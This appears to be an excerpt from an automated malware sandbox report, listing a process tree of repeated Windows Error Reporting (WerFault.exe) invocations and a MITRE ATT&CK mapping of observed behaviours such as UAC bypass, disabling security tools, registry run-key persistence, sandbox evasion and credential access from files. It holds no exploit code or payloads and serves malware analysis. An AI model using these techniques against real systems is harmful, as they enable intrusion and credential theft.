C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5056 -ip 5056
1⤵
PID:9028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2856 -ip 2856
1⤵
PID:7944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 132 -ip 132
1⤵
PID:10692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 9084 -ip 9084
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 13612 -ip 13612
1⤵
PID:12180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 14800 -ip 14800
1⤵
PID:3160

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

File Deletion

Impair Defenses

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery